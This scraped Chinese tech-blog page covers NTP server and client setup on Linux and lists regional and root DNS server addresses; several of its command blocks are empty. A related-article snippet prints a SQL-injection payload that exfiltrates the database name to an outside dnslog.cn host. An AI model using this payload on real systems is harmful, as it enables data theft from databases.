NTP服务器的配置和使用

为了避免Linux系统的主机，在长时间运行下所导致的时间偏差。因此我们需要对时间进行时间同步(synchronize)。我们一般使用ntp服务来同步不同机器的时间。NTP 是网络时间协议（Network Time Protocol）的简称，他是通过UDP协议，对时间进行同步的。

编辑NTP Server的主要配置文件为/etc/ntp.conf ，如下：

配置含义：

配置完毕，重启NTP服务，使配置更改生效。

查看NTP服务和上级连通状态

内网其他设备作为NTP的客户端配置，相对就比较简单，而且所有设备的配置都相同。

首先需要安装NTP服务（与NTP-Server完全一样）。然后找其中一台配置/etc/ntp.conf文件，配置完成验证通过后，拷贝到其他客户端机器，直接使用即可。

注释掉之前的上层服务,以下几行

添加本地的NTP服务器即可完成配置

可以用date命令查看时区

如果时区是EST需要改成CST

选择亚洲 /中国 /北京 /然后确认

改完后执行如下复制语句

使用

172.17.30.100为你的NTP服务器的ip地址，显示adjust time server 192.168.1.135 offset 0.004882 sec

这里有可能出现同步失败，一般情况下原因都是本地的NTPD服务器还没有正常启动起来，一般需要几分钟时间后才能开始同步。

也有报错 no server suitable for synchronization found，这种问题由一下两种情况造成：

Server dropped: strata too high：

并且显示“stratum 16”。而正常情况下stratum这个值得范围是“0~15”。

这种问题往往是由ntp服务启动后还没有和上层服务同步完成，可以等五分钟再次查看。

Server dropped: strata no data：

这种问题一般是因为访问不到NTP服务，需要检查NTP服务是否启动成功，或者是否是被防火墙拦截。

启动NTP_Client

启动后，查看同步情况

由于是内网，NTP服务很快会同步上，可以使用下面命令查看时间是否和服务器时间相同

本机客户端配置完成后，需要同步的客户端机器使用SCP拷贝/etc/ntp.conf，命令如下，启动NTP服务即可。

Linux的NTP配置总结

NTP服务及时间同步问题

港澳台DNS服务器地址

香港：

205.252.144.228

208.151.69.65

202.181.202.140

202.181.224.2

澳门：

202.175.3.8

202.175.3.3

台湾：

168.95.192.1

168.95.1.1

国外DNS服务器地址

美国：

208.67.222.222

208.67.220.220

165.87.13.129

165.87.201.244

205.171.3.65

205.171.2.65

198.41.0.4

198.41.0.4

198.32.64.12

192.33.4.12

192.203.230.10

192.5.5.241

192.112.36.4

192.36.148.17

192.58.128.30

192.9.9.3

193.0.14.129

128.9.0.107

128.8.10.90

66.33.206.206.

208.96.10.221

66.33.216.216

205.171.3.65

205.171.2.65

165.87.13.129

165.87.201.244

加拿大：

209.166.160.36

209.166.160.132

英国：

193.0.14.129

日本

202.12.27.33

202.216.228.18

韩国：

164.124.101.31

203.248.240.31

168.126.63.60

168.126.63.61

新西兰：

202.27.184.3

泰国：

209.166.160.132

202.44.8.34

202.44.8.2

印度：

202.138.103.100

202.138.96.2

国内各省市DNS服务器地址

北京：

202.96.199.133

202.96.0.133

202.106.0.20

202.106.148.1

202.97.16.195

202.138.96.2

深圳：

202.96.134.133

202.96.154.15

广州：

61.144.56.100

61.144.56.101

广东：

202.96.128.86

202.96.128.143

上海：

202.96.199.132

202.96.199.133

202.96.209.5

202.96.209.133

天津：

202.99.96.68

202.99.104.68

广西：

202.96.128.68

202.103.224.68

202.103.225.68

河南：

202.102.227.68

202.102.245.12

202.102.224.68

河北：

202.99.160.68

福建：

202.101.98.54

202.101.98.55

厦门：

202.101.103.55

202.101.103.54

湖南：

202.103.0.68

202.103.96.68

202.103.96.112

湖北：

202.103.0.68

202.103.0.117

202.103.24.68

江苏：

202.102.15.162

202.102.29.3

202.102.13.141

202.102.24.35

浙江：

202.96.102.3

202.96.96.68

202.96.104.18

陕西：

202.100.13.11

202.100.4.16

202.100.4.15

202.100.0.68

山东：

202.102.154.3

202.102.152.3

202.102.128.68

202.102.134.68

山西：

202.99.192.68

202.99.198.6

四川：

202.98.96.68

61.139.2.69

重庆：

61.128.128.68

成都：

202.98.96.68

202.98.96.69

辽宁：

202.98.0.68

202.96.75.68

202.96.75.64

202.96.69.38

202.96.86.18

202.96.86.24

安徽：

202.102.192.68

202.102.199.68

10.89.64.5

吉林：

202.98.5.68

202.98.14.18

202.98.14.19

江西：

202.101.224.68

202.109.129.2

202.101.240.36

新疆：

61.128.97.74

61.128.97.73

贵州：

202.98.192.68

10.157.2.15

云南：

202.98.96.68

202.98.160.68

黑龙江：

202.97.229.133

202.97.224.68

219.150.32.132

海南：

202.100.192.68

202.100.199.8

宁夏：

202.100.0.68

202.100.96.68

甘肃：

202.100.72.13

内蒙古：

202.99.224.68

青海：

202.100.128.68

全球路由DNS服务器

全球只有13台路由DNS根服务器，在13台路由服务器中，名字分别为“A”至“M”，其中10台设置在美国，另外各有一台设置于英国、瑞典和日本。下表是这些机器的管理单位、设置地点及最新的IP地址。

名称管理单位及设置地点IP地址

A INTERNIC.NET（美国，弗吉尼亚州） 198.41.0.4

B 美国信息科学研究所（美国，加利弗尼亚州） 128.9.0.107

C PSINet公司（美国，弗吉尼亚州） 192.33.4.12

D 马里兰大学（美国马里兰州） 128.8.10.90

E 美国航空航天管理局[NASA]（美国加利弗尼亚州） 192.203.230.10

F 因特网软件联盟（美国加利弗尼亚州） 192.5.5.241

G 美国国防部网络信息中心（美国弗吉尼亚州） 192.112.36.4

H 美国陆军研究所（美国马里兰州） 128.63.2.53

I Autonomica公司（瑞典，斯德哥尔摩） 192.36.148.17

J VeriSign公司（美国，弗吉尼亚州） 192.58.128.30

K RIPE NCC（英国，伦敦） 193.0.14.129

L IANA （美国，弗吉尼亚州） 198.32.64.12

打开CSDN APP，看更多技术内容

【Swoole系列2.6】Redis 服务器_码农老张Zy的博客

服务端的意思是一个可以提供服务的应用,redis-server 才是我们最熟悉的那个 Redis 的服务端。 那么在Swoole中,这个 Redis 服务端是个什么东西呢?其实它是一个基于 Redis 协议的服务器程序,可以让我们使用 Redis 的客户端来连接这个服务...

继续访问

...内网服务器,同时内网用户实现通过公网地址访问内外那个服务器...

在实际应用中,路由器作为联网设备,wan口接运营商(唯一一个公网地址),内网口(作为网关)接内网,内部有一台服务器,面向所有用户。内网IP地址192.168.2.1(g0/0/2), 外网IP地址:219.146.84.42(g0/0/1),服务器ip192.168.2.12 (2).客...

继续访问

国内外DNS大全

你还在为上网找不到dns而发愁吗？ 港澳台DNS服务器地址 香港：205.252.144.228208.151.69.65202.181.202.140202.181.224.2 澳门：202.175.3.8202.175.3.3 台湾：168.95.192.1168.95.1.1 国外DNS服务器地址 美国：　...

继续访问

免费公共DNS服务器IP地址大全

国内常用公共DNS 114 DNS： （114.114.114.114；114.114.115.115） 114DNS安全版（114.114.114.119；114.114.115.119） 114DNS家庭版（114.114.114.110；114.114.115.110） 阿里 AliDNS： （223.5.5.5；223.6.6.6） 百度 BaiduDNS（新增ipv6地址...

继续访问

网络显示服务器,服务器网络-什么是网络中所说的服务器

“床”就是保证你和老婆所有程序都能正常运行的服务器。 当然极个别情况除外 去网络手册中查即可知道答案! 服务器干什么用的 从广义上讲,服务器是指网络中能对其它机器提供某些服务的计算机系统(如果一个PC对外提供ftp服务,也可以叫服...

继续访问

rp魔兽那个服务器人最多,《魔兽世界》怀旧服RP服务器介绍 什么是...

在这里,有着绅士的圣骑士,阴冷孤僻的盗贼,粗狂豪迈的战士,平衡自然的德鲁伊。当然,这一切都不是必须的,因为在RP服务器中最重要的是你对角色的理解,以及你的扮演。即使是在阴暗处活动的盗贼也可以表现的像一个优雅的绅士,只要你能够自...

继续访问

网易dns劫持检测，dns被劫持检测方法有哪些？

1、遇到这种情况，首先是先看看其它人的电脑或手机等设备连接网络是否正常，是. 2、电脑重启后还不行，可以尝试将自己的DNS地址固定为一些免费的、速度比较快的. DNS(Domain Name System，域名系统)，因特网上作为域名和IP地址相互映射的一个分布式数据库，能够使用户更方便的访问互联网，而不用去记住能够被机器直接读取. 2、IIS7网站监控可以及时防控网站风险，快速准确监控网站是否遭到各种劫持攻击，网站在全国是否能正常打开（查看域名是否被墙），精准的DNS污染检测，具备网站打开速度检测功能，第

继续访问

各地的ADSL MODEM VPI、VCI 和DNS的信息

广西 0 35 dns 202.103.224.68 北京 0 35 DNS 202.106.196.115 广东中山 0 35 DNS : 202.96.128.68 湖南 0 35，DNS：211.98.2.4 福建，0 200 ,DNS:202.101.98.55和202.101.98.54 云南 0 35 dns:61.166.150.101 广东湛江 0 80 浙江杭州 8/35  0/

继续访问

web服务器基于那个协议,基于HTTP协议的web服务器项目_菜小倪的博客-CS...

基于HTTP 协议推动一个多线程服务器,客户端通过浏览器发送请求,服务器接收并分析客户端的请求方式和资源,从而执行相应的逻辑处理python s ixusr,最终将用户请求的资源以 HTML 页面的方式展现,并能进行差错处理。

继续访问

中国电信4g最快服务器IP,中国电信DNS IP地址大全(32个省)_眺过云端的...

中国电信 广东省 东莞市DNS 202.96.172.218 中国电信 广东省 东莞市DNS 125.93.188.250 中国电信 广东省 东莞市DNS 59.36.102.188 中国电信 广东省 东莞市DNS 218.16.97.149 中国电信 广东省 东莞市DNS 218.247.54.1 ...

继续访问

路由器显示dns服务器异常怎么办,手机显示DNS异常解决方法(图文)

【导读】手机显示DNS异常怎么办，下面就是191路由网整理的网络知识百科，来看看吧！大家好，我是191路由器网小编，上述问题将由我为大家讲解。手机显示DNS异常的解决方法：1、让手机断开网络进行重新连接。2、重连网络仍然无法解决就考虑是路由器的问题，可以重启路由器进行解决，一般路由器的可能性比较大。3、如果还是无法解决就只能升级系统固件或者直接升级最新的系统，可能是由于旧版本的漏洞问题导致的手机D...

继续访问

12个国外免费DNS服务

12个国外免费DNS服务

继续访问

无限火力那个服务器最久,lol无限火力上线仅一天各大区相继爆满最热门...

无限火力虽然好玩,但是同样出现了弊端,由于无限乱斗模式火热开启,为了保障玩家们的正常体验,已经限制了部分功能,如比赛记录,自定义模式,训练模式等,来降低服务器的负担! 而且在一同开启游戏的时候,会有一个短暂的等待时间,这段会提示目前...

继续访问

国内云服务器厂商该怎么选择?那个比较好?_有头发程序猿的博客-CSDN...

国内云服务器厂商还是很多的,排名前三的分别为阿里云,腾讯云和华为云。 阿里云起步最早,因此在用户数量和技术积累都是非常厉害的,主要在电商,支付,高并发方面有很大优势,典型的案例:淘宝,天猫,支付宝,12306等等。

继续访问

全球免费公共 DNS 解析服务器 IP 地址列表推荐 (解决无法上网/加速/防劫持)

全球免费公共 DNS 解析服务器 IP 地址列表推荐 基本上接触过网络相关知识的人应该多少都会听过DNS这个名词。因为 DNS 它非常重要，在我们上网的过程中扮演着重要的角色——“将网址/域名解析成 IP 地址”。 如果配置了不合理的DNS服务器，可能会导致网速缓慢、打不开网站；一些恶意的 DNS 还会让你电脑出现弹窗广告、网站被劫持修改 (中间人攻击)、监听等等一系列的安...

继续访问

最新发布 Cisco AnyConnect 客户端 修改默认服务器地址

macOS vim /opt/cisco/anyconnect/profile/Profile.xml <?xml version="1.0" encoding="UTF-8"?><AnyConnectProfile xmlns="http://schemas.xmlsoap.org/encoding/"><ServerList><HostEntry><User>用户名称 </User>

继续访问

lol那个服务器有无限火力,lol无限火力2021最新开放时间汇总 英雄联盟...

最近英雄联盟美服测试服已经开启无限火力模式了,那么下面一起来看看国服无限火力2021大概什么时候开放吧。 1、美服测试服的无限火力在1.22日已经开启2、国服无限火力预计会在春节期间上线,等到二月初时,官方应该会透露一些消息...

继续访问

服务器架构介绍_yayakfa的博客_什么是服务器架构

一个浏览器非常小,一般也就MB为单位。这是因为大部分工作都是服务器在做。前端页面,逻辑层,数据库,都需要放在服务器端。 浏览器的工作呢,其中包含了写前端界面中html,css,js等相应脚本语言的解释器。服务器端把前端页面的代码通过网络...

继续访问

2020 dns排名_2020年新版全球/全国各地ISP的DNS服务器地址表

【第一】国内外知名的公共DNS服务器(排列不分先后)：腾讯公共DNS(119.29.29.29、182.254.116.116)阿里公共DNS(223.5.5.5、223.6.6.6)百度公共DNS(180.76.76.76)360安全DNS(123.125.81.6)Google(8.8.8.8、8.8.4.4)114DNS(114.114.114.114、114.114.115.115)Ope...

继续访问

国外IP地址汇总

ip route 1.0.0.0 255.255.255.0 10.201.130.13  ip route 1.1.1.0 255.255.255.0 10.201.130.13  ip route 1.2.3.0 255.255.255.0 10.201.130.13  ip route 8.8.4.0 255.255.255.0 10.201.130.13  ip route 8.8.8.0...

继续访问

国内外知名公众DNS服务器IP地址列表

当前国内外主流公众DNS服务器列表 国内： CNNIC: 1.2.4.8,210.2.4.8+ AliDNS: 223.5.5.5,223.6.6.6 DNSPodPublicDNS+: 119.29.29.29,182.254.116.116 BAIDUDNS: 180.76.76.76 114DNS:http://green.114dns.com 11...

继续访问

国外ipv6服务器网站,国外 ipv6 服务器地址

国外 ipv6 服务器地址 内容精选换一换安全组创建后，您可以在安全组中设置出方向、入方向规则，这些规则会对安全组内部的云服务器出入方向网络流量进行访问控制，当云服务器加入该安全组后，即受到这些访问规则的保护。入方向：指从外部访问安全组规则下的弹性云服务器。出方向：指安全组规则下的弹性云服务器访问安全组外的实例。默认安全组规则请参见默认安全组和规则。常用的安全组规则配置示例请参见查询裸金属服务器私...

继续访问

热门推荐 国内外常用公共NTP网络时间同步服务器地址

Stratum-1在顶层，有外部UTC接入，而Stratum-2则从Stratum-1获取时间，Stratum-3从Stratum-2获取时间，以此类推，但Stratum层的总数限制在15以内。不同NTP服务器处理闰秒问题的方式可能不同，如果对时间同步精度存在需求，请关注你使用的NTP服务提供商的公告。NTP提供准确时间，首先要有准确的时间来源，这一时间应该是国际标准时间UTC。pool.ntp.org 是一个以时间服务器的大虚拟集群为上百万的客户端提供可靠的 易用的 网络时间协议（NTP）服务的项目。

继续访问

ip地址大全_2020全球公共 DNS 服务器 IP 地址大全

动动大拇指关注哦~全球公共 DNS 服务器 IP 地址大全部分往期回顾：【福利】2020开发者免费资源【福利】每日领取饿了么餐饮红包 截止日期2021年10月3124mail--临时邮箱、临时邮、临时电子邮箱、24小时邮箱国内芯片60个细分领域知名代表企业汇总资料详细说明【福利】2020钜惠流量卡，你值得拥有万兴PDF专家--一站式在线PDF解决方案【福利】企信通-...

继续访问

【DNS外带】

DNS_LOG外带 DNSLOG.cn （实际情况中你发现渗透的时候，有布尔型注入，但是很花时间，你有什么别的方法能够加快时间- 解决办法DNS_LOG外带） 普通DNS外带 http://dnslog.cn/ select load_file(concat('\\\\',(select database()),'.tqfkcu.dnslog.cn/abc')) 通过16进制编码DNS外带 select load_file(concat('\\\\',(select substr..

继续访问

全国各地DNS地址详细列表

北京DNS地址： 202.96.199.133 、202.96.0.133 、202.106.0.20 、202.106.148.1、 202.97.16.195、 202.106.196.115 上海DNS地址： 202.96.199.132 、202.96.199.133 、202.96.209.5 、202.96.209.6 、202.96.209.133 天津DNS地址： 202.99.9...

继续访问

DNS配置外网

dnssec开启，部分dns请求为不信任链导致解析延迟或者解析失败（error显示为不信任）解决方法： vi /etc/named.conf dnssec-enable nodnssec-valication no转载于:https://www.cnblogs.com/Liang-jc/p/9789125.html...

继续访问

175.6.172.218 是那个服务器

写评论

评论

收藏

NTP服务器【Network Time Protocol(NTP)】是用来使计算机时间同步化的一种协议，它可以使计算机对其服务器或时钟源(如石英钟，GPS等等)做同步化，它可以提供高精准度的时间校正(LAN上与标准间差小于1毫秒，WAN上几十毫秒)，且可介由加密确认的方式来防止恶毒的协议攻击。时间按NTP服务器的等级传播。按照离外部UTC源的远近把所有服务器归入不同的Stratum(层)中。

                                                          

网络时间协议(NTP)用来同步网络上不同主机的系统时间。你管理的所有主机都可以和一个指定的被称为 NTP  服务器的时间服务器同步它们的时间。而另一方面，一个 NTP 服务器会将它的时间和任意公共 NTP 服务器，或者你选定的服务器同步。由 NTP  管理的所有系统时钟都会同步精确到毫秒级。

在公司环境中，如果他们不想为 NTP 传输打开防火墙，就有必要设置一个内部 NTP 服务器，然后让员工使用内部服务器而不是公共 NTP  服务器。在这个指南中，我们会介绍如何将一个 CentOS 系统配置为 NTP 服务器。在介绍详细内容之前，让我们先来简单了解一下 NTP 的概念。

为什么我们需要 NTP?

由于制造工艺多种多样，所有的(非原子)时钟并不按照完全一致的速度行走。有一些时钟走的比较快而有一些走的比较慢。因此经过很长一段时间以后，一个时钟的时间慢慢的和其它的发生偏移，这就是常说的  “时钟漂移” 或 “时间漂移”。为了将时钟漂移的影响最小化，使用 NTP 的主机应该周期性地和指定的 NTP 服务器交互以保持它们的时钟同步。

在不同的主机之间进行时间同步对于计划备份、入侵检测记录、分布式任务调度或者事务订单管理来说是很重要的事情。它甚至应该作为日常任务的一部分。

NTP 的层次结构

NTP 时钟以层次模型组织。层级中的每层被称为一个 stratum(阶层)。stratum 的概念说明了一台机器到授权的时间源有多少 NTP  跳。

Stratum 0 由没有时间漂移的时钟组成，例如原子时钟。这种时钟不能在网络上直接使用。Stratum N (N >1) 层服务器从  Stratum N-1 层服务器同步时间。Stratum N 时钟能通过网络和彼此互联。

NTP 支持多达 15 个 stratum 的层级。Stratum 16 被认为是未同步的，不能使用的。

准备 CentOS 服务器

现在让我们来开始在 CentOS 上设置 NTP 服务器。

首先，我们需要保证正确设置了服务器的时区。在 CentOS 7 中，我们可以使用 timedatectl  命令查看和更改服务器的时区(比如，"Australia/Adelaide"，LCTT 译注：中国可设置为 Asia/Shanghai )

代码如下:

# timedatectl list-timezones | grep Australia

# timedatectl set-timezone Australia/Adelaide

# timedatectl

继续并使用 yum 安装需要的软件

代码如下:

# yum install ntp

然后我们会添加全球 NTP 服务器用于同步时间。

代码如下:

# vim /etc/ntp.conf

server 0.oceania.pool.ntp.org

server 1.oceania.pool.ntp.org

server 2.oceania.pool.ntp.org

server 3.oceania.pool.ntp.org

默认情况下，NTP 服务器的日志保存在 /var/log/messages。如果你希望使用自定义的日志文件，那也可以指定。

复制代码

代码如下:

logfile /var/log/ntpd.log

如果你选择自定义日志文件，确保更改了它的属主和 SELinux 环境。

复制代码

代码如下:

# chown ntp:ntp /var/log/ntpd.log

# chcon -t ntpd_log_t /var/log/ntpd.log

现在初始化 NTP 服务并确保把它添加到了开机启动。

代码如下:

# systemctl restart ntp

# systemctl enable ntp

验证 NTP Server 时钟

我们可以使用 ntpq 命令来检查本地服务器的时钟如何通过 NTP 同步。

下面的表格解释了输出列。

remote 源在 ntp.conf 中定义。‘*’ 表示当前使用的，也是最好的源‘+’ 表示这些源可作为 NTP 源‘-’  标记的源是不可用的。

refid 用于和本地时钟同步的远程服务器的 IP 地址。

st Stratum(阶层)

t 类型。 'u' 表示单播(unicast)。其它值包括本地(local)、多播(multicast)、广播(broadcast)。

when 自从上次和服务器交互后经过的时间(以秒数计)。

poll 和服务器的轮询间隔，以秒数计。

reach 表示和服务器交互是否有任何错误的八进制数。值 337 表示 100% 成功(即十进制的255)。

delay 服务器和远程服务器来回的时间。

offset 我们服务器和远程服务器的时间差异，以毫秒数计。

jitter 两次取样之间平均时差，以毫秒数计。

控制到 NTP 服务器的访问

默认情况下，NTP 服务器允许来自所有主机的查询。如果你想过滤进来的 NTP 同步连接，你可以在你的防火墙中添加规则过滤流量。

# iptables -A INPUT -s 192.168.1.0/24 -p udp --dport 123 -j ACCEPT

# iptables -A INPUT -p udp --dport 123 -j DROP

该规则允许从 192.168.1.0/24 来的 NTP 流量(端口 UDP/123)，任何其它网络的流量会被丢弃。你可以根据需要更改规则。

配置 NTP 客户端

1. Linux

NTP 客户端主机需要 ntpupdate 软件包来和服务器同步时间。可以轻松地使用 yum 或 apt-get  安装这个软件包。安装完软件包之后，用服务器的 IP 地址运行下面的命令。

代码如下:

# ntpdate

基于 RHEL 和 Debian 的系统命令都相同。

2. Windows

如果你正在使用 Windows，在日期和时间设置(Date and Time settings)下查找网络时间(Internet Time)。

3. Cisco 设备

如果你想要同步 Cisco 设备的时间，你可以在全局配置模式下使用下面的命令。

代码如下:

# ntp server

来自其它厂家的支持 NTP 的设备有自己的用于网络时间的参数。如果你想将设备和 NTP服务器同步时间，请查看设备的说明文档。

结论

总而言之，NTP 是在你的所有主机上同步时钟的一个协议。我们已经介绍了如何设置 NTP 服务器并使支持 NTP 的设备和服务器同步时间。

---